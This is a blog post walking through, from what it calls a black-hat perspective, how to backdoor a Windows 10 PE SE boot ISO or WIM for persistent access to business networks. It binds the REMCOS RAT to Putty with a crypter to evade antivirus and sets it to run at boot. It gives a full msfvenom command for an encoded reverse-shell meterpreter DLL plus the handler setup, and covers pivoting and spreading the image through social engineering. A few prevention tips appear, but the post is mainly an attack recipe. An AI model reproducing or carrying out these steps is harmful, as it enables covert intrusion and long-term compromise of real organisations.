Monday, October 31, 2016
Tuesday, October 25, 2016
Wednesday, October 12, 2016
Persistent Backdooring Win10PE SE ISO or WIM
My goal was to create a persistent backdoor on a small business or corporate network. Using Win10PE SE build on either an ISO or WIM file within the skill level of any attacker. I chose to use REMCOS rat. REMCOS is RAT used for good and bad it’s a tool it often is used by blackhats and at a price of only 60.00 a month it’s worth the cost. http://breaking-security.net/remcos.php
Also, Anti-Analysis can prolong the life of your backdoor.
I choose Octopus crypter/binder (crypter tools to evade anti-virus detection) to bind (bind to attach a virus to legitimate program which executes the legitimate program and the rat server simultaneously) Putty as an example of a trusted program. As for crypters, you can use old free crypters or you can get something modern with a private stub giving you months without detection.
Note most of the functions work on REMCOS notably the file manager and dll injection. I tested metasploits meterpreter rat by injecting dll payload meterpreter.dll. I found not only did meterpeter work but it was also possible to pivot off the Windows 10 PE SE live ISO file or WIM. The pivot allows the attacker to enumerate and exploit machines on any other networks connected to the machine running the Windows 10PE SE ISO or WIM.
I tested Empire and successfully injected dll payload Empire.dll
An attacker could spread a backdoored windows10PE SE ISO or WIM through social engineering or using existing access if the person happens to be inside threat. This threat could probably fly under the radar for a while giving an attacker sporadic access to the network this attack probably is only useful if the victim frequently uses the backdoored ISO or WIM (A file which can be setup to boot off the network) http://www.howtogeek.com/162070/it-geek-how-to-network-boot-pxe-the-winpe-recovery-disk-with-pxelinux-v5-wimboot/
Effects of a persistent backdoor trojan
1. An attacker can now access any drive mounted on the infected computer this can be used to bind your bot or rat to a persistent mounted hard drive with an OS mounted on it provided the file system is not encrypted programs on the mounted drive hard drive.
2. An attacker could load metasploits meterpreter tool to pivot to attack another machine on a private network.
3. A trojan could last undected by av for a long time months if the attacker is willing to get private stub for encrypting this could be done with just $100.00
What can be done to prevent it
1. Don’t trust sites that are not well known for “free” compiled ISOS or WIMS malware-fighting tools
2. Look to see if there are any Untrusted programs in AppsMy when building your ISO or WIM
3. After building ISO scan the ISO for malware with Kaspersky or Bitdefender
4. Check MD5 hashes to see if a tool has been modified by a binder/crypter
Step by Step from a black hat perspective
1. Crypt your RAT and bind it to Putty.exe example using Octopus 2.3.2
d
2. Check your file for detection https://nodistribute.com
f
j
ll
3.You can create Windows 10 PE ISO or WIM with WinBuilder
I used Windows 10 Enterprise 2015 LTSB Evaluation trial for the ISO or WIM
Link for WinBuilder http://win10se.cwcodes.net/Compressed/
Launch the WinBuilder
a. Click under Utils to PC Packed
b. Add backdoor BadPutty to a zip file BadPutty.zip
c. Name the backdoor executable in the zip file above BadPutty.exe
1. Click AppsMy
a. Click 2Prepare
b. Click BadPutty
c. Only select startup
4. Boot your win10PE SE ISO or WIM file Putty will automatically load and execute Putty and the RAT binded to it.
Create a dll payload meterpreter.dll in Kali
example
root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.202.133 LPORT=1337 -b "\x00" -e x86/shikata_ga_nai -f dll -o /root/Desktop/Meterpreter.dll
handler first enter metapsloit in Kali
root@kali:~# msfconsole
use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.202.133
msf exploit(handler) > set LPORT 1337
msf exploit(handler) > exploit -j
Create a dll payload Empire.dll tested in Kali
Load your dll payload into memory with Remcos
Any feedback would be greatly appreciated.
Subscribe to:
Posts (Atom)